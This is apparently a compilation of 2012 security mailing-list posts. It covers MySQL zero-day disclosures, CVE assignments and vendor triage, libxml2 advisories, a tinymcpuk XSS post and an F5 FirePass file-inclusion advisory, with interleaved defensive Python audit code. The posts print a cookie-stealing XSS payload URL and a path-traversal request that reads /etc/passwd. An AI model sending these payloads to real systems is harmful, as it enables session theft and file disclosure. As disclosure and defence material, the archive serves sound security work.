   0x81bf557 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1383>: call   0x8541560 <llstr>
   0x81bf55c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1388>: mov    -0x9b0(%ebp),%edx
   0x81bf562 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1394>: lea    -0x590(%ebp),%eax
   0x81bf568 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1400>: mov    %edi,0x1c(%esp)
   0x81bf56c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1404>: lea    -0x990(%ebp),%edi
   0x81bf572 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1410>: mov    %eax,0x18(%esp)
(gdb) i r
eax            0xa8f1c804  -1460549628
ecx            0x0         0
edx            0xa8f1c805  -1460549627
ebx            0x8e821e0   149430752
esp            0xa8f1be50  0xa8f1be50
ebp            0xa8f1c868  0xa8f1c868
esi            0xa8f1c81a  -1460549606
edi            0xa8f1c804  -1460549628
eip            0x81bf54a   0x81bf54a <mysql_binlog_send(THD*, char*,
MySQL Remote Preauth User Enumeration Zeroday
(see attachment)

Cheerio,
Kingcope

Attachment: mysql_userenum.pl (Description: Binary data)
Re: [Full-disclosure] MySQL (Linux) Heap Based Overrun PoC Zeroday
Hi Kingcope,

> # As seen below $edx and $edi are fully controlled,
> # the current instruction is
> # => 0x83a6b24 <free_root+180>: mov (%edx),%edi
> # this means we landed in a place where 4 bytes can be controlled by 4 bytes
> # with this function pointers and GOT entries can be rewritten to execute arbitrary code

Out of curiosity, is this exploitable when using hardened toolchain settings? Specifically, -z,noexecheap, -z,now, and -z,relro?

For no-exec heaps, you need to be on Gentoo or other platforms which offer the remediation.

Jeff

On Sat, Dec 1, 2012 at 4:26 PM, king cope <isowarez.isowarez.isowa...@googlemail.com> wrote:
> (see attachment)
>
> Cheerio,
> Kingcope
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi Kingcope,

> MySQL Server exploitable stack based overrun
> Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too)
> unprivileged user (any account (anonymous account?), post auth)
> as illustrated below the instruction pointer is overwritten with 0x41414141
> bug found by Kingcope
> this will yield a shell as the user 'mysql' when properly exploited

Out of curiosity, is this exploitable when using hardened toolchain settings? Specifically, -D_FORTIFY_SOURCES=2 and -fstack-protector-all?

Jeff

On Sat, Dec 1, 2012 at 4:26 PM, king cope <isowarez.isowarez.isowa...@googlemail.com> wrote:
> (see attachment)
>
> Cheerio,
> Kingcope
Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 12/01/2012 02:26 PM, king cope wrote:
> (see attachment)
>
> Cheerio,
> Kingcope

So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVEs for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure.

I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on.

http://seclists.org/fulldisclosure/2012/Dec/4

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJQuu5zAAoJEBYNRVNeJnmTF8sP/10htpTkb298u/Szo3yOcRiE
8HgMwXPVGFhPh0d/avRgIocYeJxIH9oUf7xN/A53TXktgp7CZZUMhJAh4Hv5mrFn
moVGxs3qBaTT8+zFa8Ea7VUqzYXUGdMNPBeyijyw18WRHu7ETrUg2pXREkr056ol
GRt5BuMyzz7sdlLNCYWki+uMIxWtnyjw4ngkNCcAbDuPGdmIxwTiNQ8oOLWRgs/+
ybL0EXWIJgeBWBdsx0nlJNrL6gHqCsfZduKNl95MAdFHRMiOFrc/GQWfL81d+q86
upWQ+S7U8or/dpcD7eKInSmGvjgoFR+cF1S2lkDqBLXg2ER8aZzemaG/8p+m4ICH
Cef7Zt7q5F+FaSC4wOeCmmR0SmeA1ZO1krY8Ur3oyuYr39Iegk1O48hAzAP4RbDS
+m0pPFNanDuW2h9NSjAx19C2qgEMoMGCaTpJY1mfF3Zus5ctxXyYtNU1g/yIGr3f
E2boYVOYW4CPJSRGkeF6n1Vf+c+Sov/0/enxJxUsf9tA58iQUSQNsI+aSj71oI3v
1Y0/Ce3FKAJRkgY374TD+K834ruhFAO9xJXdA1MSDdz4rJ1uQusIKufz3ubjHCWP
KhgpV2Pp1Gq5+XGuNPKn06cNh8a/oYubMNpQBxeIbWYm6eFuUvwnSP9ki+hPLjvw
fa9hdUARqamhayQbkNdH
=sXhV
-----END PGP SIGNATURE-----
Re: [Full-disclosure] MySQL (Linux) Heap Based Overrun PoC Zeroday
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 12/01/2012 02:26 PM, king cope wrote:
> (see attachment)
>
> Cheerio,
> Kingcope

So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly. If Oracle security has already assigned CVEs for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure.

I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on.

Please use CVE-2012-5612 for MySQL (Linux) Heap Based Overrun PoC Zeroday

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBAgAGBQJQuvEXAAoJEBYNRVNeJnmTsnsQAMcUAB1u2mbcx31EDRMKePHN
njyDbDp5PkQVyfcYPtwnZgK4Uid2z1be7Dl4f1Q++FUkMO/2/I/SNu206PvMgVRA
ZJIXw2o38UZUNIvD23yUOQyMLUJBqGGhfo9PiXogyyrZ27JzqTOIxv2fnRcpJCVJ
OFZV8ivkDWFZCSAPrkjN+6kOHVQ+9OVrzQ8yX8YnxxKmVrPJm/smCFhpg63WQ6bX
ebIs8bjpedpSCKiZQH7pDslapELwKB8jQNksAfI38IZjz/lq7HMzDHPXnp3ns5gE
A6+yJOsM2mDjFQtHdN/RVjVqqiE1c3bTHc3FYJ1H5i4AHaq2VHEt53TsATOwmWaE
Ph6KeHNiXB0oVSOnREbRT+zjiygQgf3d6O+EHywdqA2jShEL/cYRUc+6AAhAteqY
9YWL7vJdr+Rz95g5YBMQ8/HNmakMX/7ZgW09EVj27KuaCtsjAOUJSNL2smGSvIRK
1waxZDl43cXQate+1+sYDteYya22kz15Cp9AJoxHJR+pFyNVTDp5lRH5BmfjKcUi
QcHoHPRZ5mIySw1no74HNki3WYCQUlMqKH+v6eZxGXhr5X5hUW3ArJzVrlaKeOEG
1VlWuD+c6SDBtnjS8+m5SqdL6nM2dRr6DcO5M6lB5tcqcowNSstphl8uCM2gBQ3S
49cJjvgFAdHE4MFIE4lR
=BVqr
-----END PGP SIGNATURE-----
Re: [Full-disclosure] MySQL (Linux) Database Privilege Elevation Zeroday Exploit
On 12/01/2012 02:26 PM, king cope wrote:
> (see attachment)
>
> Cheerio,
> Kingcope

So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly.

If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure.

I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on.

Please use CVE-2012-5613 for MySQL (Linux) Database Privilege Elevation Zeroday Exploit

--
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Re: [Full-disclosure] MySQL Denial of Service Zeroday PoC
On 12/01/2012 02:26 PM, king cope wrote:
> (see attachment)
>
> Kingcope

So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly.

If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure.

I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on.

Please use CVE-2012-5614 for MySQL Denial of Service Zeroday PoC

--
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Re: [Full-disclosure] MySQL Remote Preauth User Enumeration Zeroday
On 12/01/2012 02:26 PM, king cope wrote:
> (see attachment)
>
> Cheerio,
> Kingcope

So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly.

If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure.

I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on.

Please use CVE-2012-5615 for MySQL Remote Preauth User Enumeration Zeroday

--
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Re: [Full-disclosure] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
On 12/01/2012 11:41 AM, king cope wrote:
> *** FARLiGHT ELiTE HACKERS LEGACY R3L3ASE ***
>
> Attached is the MySQL Windows Remote Exploit (post-auth, udf technique) including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org.
>
> Cheerio,
> Kingcope

So in the case of this issue it appears to be documented (UDF, do not run MySQL as administrator, etc.). As I understand CVE assignment rules this issue does not require a CVE, however just to be on the safe side I'm CC'ing MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on.

--
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Re: [Full-disclosure] MySQL (Linux) Heap Based Overrun PoC Zeroday
On 12/01/2012 02:26 PM, king cope wrote:
> (see attachment)
>
> Cheerio,
> Kingcope

So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly.

If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure.

I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on.

Sorry forgot the CVE the first time:

Please use CVE-2012-5611 for MySQL (Linux) Stack based buffer overrun PoC Zeroday

--
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi, Kurt!

This is CVE-2012-5579 that we've been discussing recently. A test case is different, but it triggers exactly the same code.

MariaDB is not vulnerable as of 5.1.66, 5.2.13, 5.3.11, 5.5.28a. Latest released MySQL versions are still affected, but Oracle knows about this issue, so next versions won't be.

Regards,
Sergei
MariaDB Security Coordinator

On Dec 01, Kurt Seifried wrote:
> On 12/01/2012 02:26 PM, king cope wrote:
>> (see attachment)
>>
>> Cheerio,
>> Kingcope
>
> So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly.
>
> If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure.
>
> I am also adding MySQL, Oracle, MariaDB, OSS-SEC, Steven Christey, cve-assign and OSVDB to the CC so that everyone is aware of what is going on.
>
> http://seclists.org/fulldisclosure/2012/Dec/4
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
On 12/02/2012 11:30 AM, Kurt Seifried wrote:
> So normally for MySQL issues Oracle would assign the CVE #. However in this case we have a bit of a time constraint (it's a weekend and this is blowing up quickly) and the impacts are potentially quite severe. So I've spoken with some other Red Hat SRT members and we feel it is best to get CVE #'s assigned for these issues quickly so we can refer to them properly.
>
> If Oracle security has already assigned CVE's for these please let us and the public know so we can use the correct numbers. Also if Oracle can let the public know which versions of MySQL are affected (e.g. 5.0.x, 5.1.x, 5.5.x, etc.) that would be very helpful to everyone I am sure.

So here are the CVEs which Kurt meant to assign, but somehow that mail never reached the lists.

* CVE-2012-5611 MySQL (Linux) Stack based buffer overrun PoC Zeroday
  http://seclists.org/fulldisclosure/2012/Dec/4
  https://bugzilla.redhat.com/show_bug.cgi?id=882599

* CVE-2012-5612 MySQL (Linux) Heap Based Overrun PoC Zeroday
  http://seclists.org/fulldisclosure/2012/Dec/5
  https://bugzilla.redhat.com/show_bug.cgi?id=882600

* CVE-2012-5613 MySQL (Linux) Database Privilege Elevation Zeroday Exploit
  http://seclists.org/fulldisclosure/2012/Dec/6
  https://bugzilla.redhat.com/show_bug.cgi?id=882606

* CVE-2012-5614 MySQL Denial of Service Zeroday PoC
  http://seclists.org/fulldisclosure/2012/Dec/7
  https://bugzilla.redhat.com/show_bug.cgi?id=882607

* CVE-2012-5615 MySQL Remote Preauth User Enumeration Zeroday
  http://seclists.org/fulldisclosure/2012/Dec/9
  https://bugzilla.redhat.com/show_bug.cgi?id=882608

--
Huzaifa Sidhpurwala / Red Hat Security Response Team
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi, Huzaifa!

Here's the vendor's reply:

On Dec 02, Huzaifa Sidhpurwala wrote:
> * CVE-2012-5611 MySQL (Linux) Stack based buffer overrun PoC Zeroday
>   http://seclists.org/fulldisclosure/2012/Dec/4
>   https://bugzilla.redhat.com/show_bug.cgi?id=882599

A duplicate of CVE-2012-5579. Already fixed in all stable MariaDB versions.

> * CVE-2012-5612 MySQL (Linux) Heap Based Overrun PoC Zeroday
>   http://seclists.org/fulldisclosure/2012/Dec/5
>   https://bugzilla.redhat.com/show_bug.cgi?id=882600

Acknowledged. https://mariadb.atlassian.net/browse/MDEV-3908

> * CVE-2012-5613 MySQL (Linux) Database Privilege Elevation Zeroday Exploit
>   http://seclists.org/fulldisclosure/2012/Dec/6
>   https://bugzilla.redhat.com/show_bug.cgi?id=882606

Not a bug. MySQL manual specifies many times very explicitly:

===
* Do not grant the `FILE' privilege to nonadministrative users. Any user that has this privilege can write a file anywhere in the file system with the privileges of the `mysqld' daemon. To make this a bit safer, files generated with `SELECT ... INTO OUTFILE' do not overwrite existing files and are writable by everyone. The `FILE' privilege may also be used to read any file that is world-readable or accessible to the Unix user that the server runs as. With this privilege, you can read any file into a database table. This could be abused, for example, by using `LOAD DATA' to load `/etc/passwd' into a table, which then can be displayed with `SELECT'.
===
You should exercise particular caution in granting the `FILE' and administrative privileges:

* The `FILE' privilege can be abused to read into a database table any files that the MySQL server can read on the server host. This includes all world-readable files and files in the server's data directory. The table can then be accessed using `SELECT' to transfer its contents to the client host.
===

Additionally, MySQL (and MariaDB) provides a --secure-file-priv option that allows to restrict all FILE operations to a specific directory.

Thus, CVE-2012-5613 is not a bug, but a result of a misconfiguration, much like an anonymous ftp upload access to the $HOME of the ftp user.

> * CVE-2012-5614 MySQL Denial of Service Zeroday PoC
>   http://seclists.org/fulldisclosure/2012/Dec/7
>   https://bugzilla.redhat.com/show_bug.cgi?id=882607

Acknowledged. https://mariadb.atlassian.net/browse/MDEV-3910

> * CVE-2012-5615 MySQL Remote Preauth User Enumeration Zeroday
>   http://seclists.org/fulldisclosure/2012/Dec/9
>   https://bugzilla.redhat.com/show_bug.cgi?id=882608

This is hardly a zeroday issue, it was known for, like, ten years. But I'll see what we can do here. https://mariadb.atlassian.net/browse/MDEV-3909

Regards,
Sergei
MariaDB Security Coordinator
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
On Sun., 2012-12-02 at 21:17 +0100, king cope wrote:
> My opinion is that the FILE to admin privilege elevation should be patched. What is the reason to have FILE and ADMIN privileges separated when with this exploit FILE privileges equate to ALL ADMIN privileges.

Maybe because you might not want admins to have read/write access to the filesystem anyway?

Regards,
--
Yves-Alexis
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Correct, I tell that from experience because I've seen many configurations where the least privileged user has file privs enabled. If we leave it that way the attackers will be more happy, it's not decision to patch it or not, just a hint.

Regards,
Kingcope

2012/12/2 Yves-Alexis Perez cor...@debian.org:
> On Sun., 2012-12-02 at 21:17 +0100, king cope wrote:
>> My opinion is that the FILE to admin privilege elevation should be patched. What is the reason to have FILE and ADMIN privileges separated when with this exploit FILE privileges equate to ALL ADMIN privileges.
>
> Maybe because you might not want admins to have read/write access to the filesystem anyway?
>
> Regards,
> --
> Yves-Alexis
[SECURITY] [DSA 2580-1] libxml security update
Debian Security Advisory DSA-2580-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
December 02, 2012                      http://www.debian.org/security/faq

Package        : libxml2
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE ID         : CVE-2012-5134

Jueri Aedla discovered a buffer overflow in the libxml XML library, which could result in the execution of arbitrary code.

For the stable distribution (squeeze), this problem has been fixed in version 2.7.8.dfsg-2+squeeze6.

For the unstable distribution (sid), this problem has been fixed in version 2.8.0+dfsg1-7.

We recommend that you upgrade your libxml2 packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[ MDVSA-2012:176 ] libxml2
Mandriva Linux Security Advisory MDVSA-2012:176
http://www.mandriva.com/security/

Package : libxml2
Date: December 2, 2012
Affected: 2011., Enterprise Server 5.0

Problem Description:

A vulnerability was found and corrected in libxml2:

A heap-buffer overflow was found in the way libxml2 decoded certain XML entities. A remote attacker could provide a specially-crafted XML file, which once opened in an application linked against libxml would cause that application to crash, or, potentially, execute arbitrary code with the privileges of the user running the application (CVE-2012-5134).

The updated packages have been patched to correct this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5134

Updated Packages: Mandriva Linux 2011, Mandriva Linux 2011/X86_64, Mandriva Enterprise Server 5, Mandriva Enterprise Server 5/X86_64.

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
Re: [oss-security] Re: [Full-disclosure] MySQL (Linux) Stack based buffer overrun PoC Zeroday
Hi, king cope!

On Dec 02, king cope wrote:
> Hi,
>
> My opinion is that the FILE to admin privilege elevation should be patched. What is the reason to have FILE and ADMIN privileges separated when with this exploit FILE privileges equate to ALL ADMIN privileges.
>
> I understand that it's insecure to have FILE privileges attached to a user. But if this is a configuration issue and not a vulnerability then as stated above there must be something wrong with the privilege management in this SQL server.

You've missed that part of my reply:

> Additionally, MySQL (and MariaDB) provides a --secure-file-priv option that allows to restrict all FILE operations to a specific directory.

Normally, if a DBA wants to grant FILE privilege to users, the server will have something like secure-file-priv=/tmp/mysql (for example) specified in the configuration file. This way any operation allowed by the FILE privilege (like SELECT ... OUTFILE) will only be able to access files under the /tmp/mysql/ path.

Regards,
Sergei
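The two checks a DBA would run after reading Sergei's manual excerpt and his secure-file-priv note above, as an added example that is not code from MySQL, MariaDB or any thread participant: which accounts hold FILE (directly or through ALL PRIVILEGES), and whether secure_file_priv confines them to one directory. The my.cnf texts and the SHOW GRANTS lines are constructed; real `SHOW GRANTS FOR 'user'@'host'` output has the same shape.

```python
"""Offline audit for the FILE-privilege exposure discussed in this thread.
Added example; the config text and SHOW GRANTS lines are constructed."""
import configparser
import os
import re
from typing import Dict, List, Optional

# Constructed my.cnf: secure_file_priv unset, so FILE reaches the whole
# filesystem with the rights of the OS user mysqld runs as.
WEAK_MY_CNF = """
[mysqld]
datadir = /var/lib/mysql
user = mysql
"""

# Constructed my.cnf with the mitigation from the thread: every operation
# the FILE privilege allows (LOAD DATA, SELECT ... INTO OUTFILE, LOAD_FILE())
# is limited to /tmp/mysql.
HARDENED_MY_CNF = """
[mysqld]
datadir = /var/lib/mysql
user = mysql
secure-file-priv = /tmp/mysql
"""

# Constructed SHOW GRANTS output for a handful of accounts.
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'reader'@'localhost'",
    "GRANT SELECT ON `shop`.* TO 'reader'@'localhost'",
    "GRANT SELECT, INSERT, FILE ON *.* TO 'app'@'%'",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<user>'[^']*'@'[^']*')",
    re.IGNORECASE,
)


def _mysqld_option(my_cnf_text: str, *names: str) -> Optional[str]:
    """First of `names` present in [mysqld], or None.  MySQL treats '-' and
    '_' in option names as equivalent, so callers pass both spellings."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None)
    cp.read_string(my_cnf_text)
    if not cp.has_section("mysqld"):
        return None
    for name in names:
        if cp.has_option("mysqld", name):
            return (cp.get("mysqld", name) or "").strip().strip('"')
    return None


def secure_file_priv_setting(my_cnf_text: str) -> Optional[str]:
    return _mysqld_option(my_cnf_text, "secure_file_priv", "secure-file-priv")


def users_with_file_privilege(show_grants_lines: List[str]) -> List[str]:
    """Accounts whose global (*.*) grants include FILE.  FILE is a global
    privilege, so database-level GRANT lines can never carry it."""
    holders: List[str] = []
    for line in show_grants_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if ("FILE" in privs or "ALL PRIVILEGES" in privs) and m.group("user") not in holders:
            holders.append(m.group("user"))
    return holders


def audit(my_cnf_text: str, show_grants_lines: List[str]) -> Dict[str, object]:
    """Combine both checks into findings a DBA can act on."""
    sfp = secure_file_priv_setting(my_cnf_text)
    datadir = _mysqld_option(my_cnf_text, "datadir")
    holders = users_with_file_privilege(show_grants_lines)
    findings: List[str] = []
    if holders and not sfp:
        findings.append(
            "secure_file_priv is unset: FILE holders can read any file the mysqld "
            "OS user can read and write new files anywhere it can write"
        )
    elif holders and datadir and os.path.normpath(sfp) == os.path.normpath(datadir):
        findings.append(
            "secure_file_priv equals datadir: FILE holders can still drop files "
            "into the server's own data directory"
        )
    return {"secure_file_priv": sfp, "file_holders": holders, "findings": findings}


if __name__ == "__main__":
    for label, cnf in (("weak", WEAK_MY_CNF), ("hardened", HARDENED_MY_CNF)):
        print(label, audit(cnf, SAMPLE_GRANTS))
```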
tinymcpuk xss vulnerability
= tinymcpuk xss vulnerability =

# Exploit Title: tinymcpuk xss vulnerability
# Google Dork: n/a
# Date: 1/12/2012 (GMT+7)
# Exploit Author: eidelweiss (@randyarios)
# Vendor Homepage: http://sourceforge.net/projects/p4a/files/tinymcpuk/
# Software Link: http://sourceforge.net/projects/p4a/files/tinymcpuk/0.3/
# Version: 0.3
# Tested on: windows Ubuntu Linux

[!] about

TinyMCPUK - TinyMCE with file/image manager. TinyMCPUK brings you the powerful TinyMCE plus the MCPUK file manager and ImageManager strictly integrated together.

[!] exploit p0c

/tinymcpuk/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>

[!] sample poc

http://host/filemanager/connectors/php/connector.php?test=<h1>p0c</h1>&xss=<script>alert(document.cookie)</script>

==| -=[ E0F ]=- |==

Nb: Greetz to om wenk and all DC members.. sorry om, I'm really bored right now wkakwakwkawk.. bavod!!!
SEC Consult SA-20121203-0 :: F5 FirePass SSL VPN Unauthenticated local file inclusion
SEC Consult Vulnerability Lab Security Advisory 20121203-0
===========================================================
              title: Unauthenticated local file inclusion
            product: F5 FirePass SSL VPN
 vulnerable version: <= 7.0.0 HF-70-6
      fixed version: 7.0.0 HF-70-7
             impact: Critical
           homepage: http://www.f5.com
              found: 2012-06-01
                 by: S. Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
===========================================================

Vendor/product description:
---------------------------
The FirePass SSL VPN, available as an appliance and in a Virtual Edition, provides security, flexibility, and ease of use. It grants access to corporate applications using a technology that everyone understands: a web browser. Users can have secure access from anywhere they have an Internet connection, while FirePass ensures that connected computers are fully patched and protected. FirePass provides robust, secure SSL VPN remote access to business applications from a wide range of client devices, including Apple iPhone and Windows Mobile devices. Using full-tunnel SSL technology and client access policies defined by system administrators, remote clients can log on to corporate business applications under pre-defined access permissions and client directory control.

URL: http://www.f5.com/products/firepass/

Vulnerability overview/description:
-----------------------------------
Due to insufficient input validation, an unauthenticated attacker can disclose arbitrary local files with the privileges of the webserver. This includes the user/administrator database. As the attacker-controlled path is passed to the PHP include() function, code execution is also possible. Furthermore, the path is then passed to the unlink() function and therefore can be used to delete arbitrary files in the filesystem, which causes denial of service.

As opposed to some information on the Internet (e.g. https://twitter.com/FirePassHF/status/218886584672587776), it is not necessary to have Citrix functionality enabled in order to exploit this vulnerability.

Proof of concept:
-----------------
The flaw exists in the CitrixAuth.php script in the parameter sessionId. An attacker can traverse directories with '../' and terminate the path with a NULL byte. The following exploit shows how files can be extracted from the file system:

POST /CitrixAuth.php HTTP/1.1
Host: hostname
Content-Type: application/none
Content-Length: 68

<sessionId>../../../../../etc/passwd</sessionId>
                                    ^-- NULL byte

Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the FirePass SSL VPN version 7.0.0, which was the most recent version at the time of discovery.

Vendor contact timeline:
------------------------
2012-06-05: Contacting vendor security team via email.
2012-06-07: Response from vendor.
2012-06-12: Coordination call with vendor.
2012-06-14: Sent proof of concept exploit via encrypted channel.
2012 June: Vendor releases HF-388207-1 and informs that solution (=advisory) will be published soon.
2012-08-22: Requesting status of solution.
2012-08-22: Vendor responds that solution will be published soon.
2012-10-23: Requesting status of solution.
2012-10-23: Vendor responds that something went wrong and they will look into it.
2012-11-07: Requesting status of solution.
2012-11-29: Vendor publishes SOL14046.
2012-12-03: Public release of SEC Consult advisory.

Solution:
---------
Apply HF-70-7 or HF-388207-1. For detailed information see:
http://support.f5.com/kb/en-us/solutions/public/14000/000/sol14046.html

Patch information is also available at:
http://support.f5.com/kb/en-us/solutions/public/13000/800/sol13826.html

Workaround:
-----------
No workaround available.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF S. Viehböck / @2012
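The validation the advisory says is missing, written as an added example that is not F5's code: a client-supplied sessionId that is later turned into a file path for include() and unlink() is checked against an allow-list (which rejects '../', absolute paths, NUL bytes and percent-encoded variants in one place) and then confined to a base directory with a realpath check. The function names, the XML extraction and the session directory are assumptions for illustration; the request bodies are constructed, not captured traffic.

```python
"""Hardened handling of a sessionId value that later selects a file on disk.
Added example, not F5's code; names and the base directory are assumptions."""
import os
import re
import tempfile

# Constructed base directory for session files (assumption, not F5's layout).
SESSION_DIR = os.path.join(tempfile.gettempdir(), "session-files-demo")

# Allow-list: a session id is an opaque token, so it never needs '/', '.',
# '%' or control characters.  Anything outside this set is refused.
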